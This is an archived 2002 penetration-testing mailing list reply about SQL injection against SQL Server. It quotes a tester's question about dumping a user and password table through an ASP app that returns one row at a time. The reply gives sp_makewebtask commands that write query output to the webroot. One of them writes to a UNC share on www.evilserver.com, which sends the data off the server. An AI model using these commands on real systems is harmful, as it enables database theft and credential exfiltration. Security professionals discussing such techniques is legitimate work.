Re: SQL Injection - retrieving all rows

From: Kevin Spett (kspettat_private)
Date: Wed Mar 20 2002 - 19:00:03 PST

Next message: Kirk Schafer: "Re: SQL Injection - retrieving all rows"

Previous message: Zacharias Pigadas: "RE: SQL Injection - retrieving all rows"
Maybe in reply to: mel: "SQL Injection - retrieving all rows"
Next in thread: Kirk Schafer: "Re: SQL Injection - retrieving all rows"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

See if you can access sp_makewebtask.  It builds an html table with the
output of your query.  It's installed by default without any kind of access
control.  It works like this:
     sp_makewebtask 'c:\inetpub\wwwroot\sqloutput.html', 'SELECT name FROM
sysobjects WHERE xtype=''U'''
    (I'm pretty sure in SQL Server to use quoted parameters inside of quotes
you double single quotes, not double quotes.)
You can even specify a UNC path for the output file, like this:
     sp_makewebtask '\\www.evilserver.com\publicshare\sqloutput.html',
'SELECT name FROM sysobjects WHERE xtype=''U'''
The directory "publicshare" needs to be a wide open SMB share... if any kind
of authentication challenge is present, the file won't be recieved.

If that fails, you could use a perl or python script.



Kevin Spett
SPI Dynamics, Inc.
>
>
> ----- Original Message -----
> From: "mel" <meling@scan-associates.net>
> To: <pen-testat_private>
> Sent: Wednesday, March 20, 2002 3:24 AM
> Subject: SQL Injection - retrieving all rows
>
>
> > Hi,
> >
> > I've been able to enumerate over 50 plus tables in a recent pen-test,
> > now come the hard part - I want to dump data from the most important
> > table that contains user names and passwords. However, the ASP app
> > that I exploit only returns one row at a time. Is there anyway to
> > overcome this?
> >
> > I've been looking for apps that return multiple rows (such as
search,etc)
> > but to know avail. I've tried dumping asp codes using BULK INSERT, but
> > the command is only available for system account. Creating an stored
> > procedure does not seem to work as well :(
> >
> > Now, I'm thinking of writing a script that dump the data one at a time,
> > but I would like the advice from fellow pen-testers first.
> >
> > Cheers,
> >
> > --mel
> >
>
> --------------------------------------------------------------------------
> --
> > This list is provided by the SecurityFocus Security Intelligence Alert
> (SIA)
> > Service. For more information on SecurityFocus' SIA service which
> > automatically alerts you to the latest security vulnerabilities please
> see:
> > https://alerts.securityfocus.com/
> >
> >
>


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: Kirk Schafer: "Re: SQL Injection - retrieving all rows"
Previous message: Zacharias Pigadas: "RE: SQL Injection - retrieving all rows"
Maybe in reply to: mel: "SQL Injection - retrieving all rows"
Next in thread: Kirk Schafer: "Re: SQL Injection - retrieving all rows"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Mar 21 2002 - 08:42:38 PST